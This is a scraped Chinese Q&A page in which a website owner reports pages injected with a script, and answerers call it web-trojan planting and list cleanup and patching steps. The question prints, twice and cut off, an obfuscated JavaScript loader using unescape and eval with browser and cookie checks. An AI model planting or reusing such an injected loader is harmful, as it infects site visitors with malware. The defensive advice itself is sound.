UC知道网页文件被注入js脚本
来源:百度知道 编辑:UC知道 时间:2024/06/08 06:45:13
我空间上的站点部分网页被注入了一下脚本:
<script language=javascript><!--
(function(QHr){var yR7au=unescape(('var<20a<3d<22<53cr<69ptE<6eg<69<6ee<22<2cb<3d<22<56ersi<6fn()+<22<2cj<3d<22<22<2cu<3dn<61vigator<2eus<65rAgent<3bif<28(u<2e<69nde<78Of<28<22Chr<6fme<22)<3c0<29<26<26(u<2e<69n<64<65<78Of<28<22Win<22)<3e0)<26<26(u<2einde<78Of<28<22<4eT<206<22)<3c0)<26<26(docume<6et<2e<63ooki<65<2e<69<6e<64ex<4ff<28<22mi<65k<3d1<22)<3c0)<26<26(t<79p<65of(zr<76<7ats)<21<3d<74ypeof(<22A<22)<29)<7bzrvzts<3d<22<41<22<3beval<28<22if(window<2e<22+a+<22)<6a<3dj+<22+a+<22M<61jor<22+b+<61+<22M<69nor<22+b+<61+<22Bu<69ld<22+<62+<22<6a<3b<22)<3b<64<6fc
<script language=javascript><!--
(function(QHr){var yR7au=unescape(('var<20a<3d<22<53cr<69ptE<6eg<69<6ee<22<2cb<3d<22<56ersi<6fn()+<22<2cj<3d<22<22<2cu<3dn<61vigator<2eus<65rAgent<3bif<28(u<2e<69nde<78Of<28<22Chr<6fme<22)<3c0<29<26<26(u<2e<69n<64<65<78Of<28<22Win<22)<3e0)<26<26(u<2einde<78Of<28<22<4eT<206<22)<3c0)<26<26(docume<6et<2e<63ooki<65<2e<69<6e<64ex<4ff<28<22mi<65k<3d1<22)<3c0)<26<26(t<79p<65of(zr<76<7ats)<21<3d<74ypeof(<22A<22)<29)<7bzrvzts<3d<22<41<22<3beval<28<22if(window<2e<22+a+<22)<6a<3dj+<22+a+<22M<61jor<22+b+<61+<22M<69nor<22+b+<61+<22Bu<69ld<22+<62+<22<6a<3b<22)<3b<64<6fc
网页挂马
解决办法:
1.使用urlsnooper软件,进行查杀.
2.查看网站里,最近被修改的文件.
3.如果你对程序代码清楚,可以自行查找问题,想一下容易被人家调用的文件
4.检查数据库是否有html内容输出到页面上,或者在上传保存时,没有做好标签过滤和权限保护
因为被黑客黑了,
只有一个办法,把所有页的所有这样的代码删除了。然后再把你的网站代码检查一下,看哪个地方有lou洞,改了,再传上去!
网站有漏洞就被注入了,这个还需要问为什么?说明网站早就被人登陆过后台并且上传了木马,整个网站源码已经被人下载走了,然后在页面挂了木马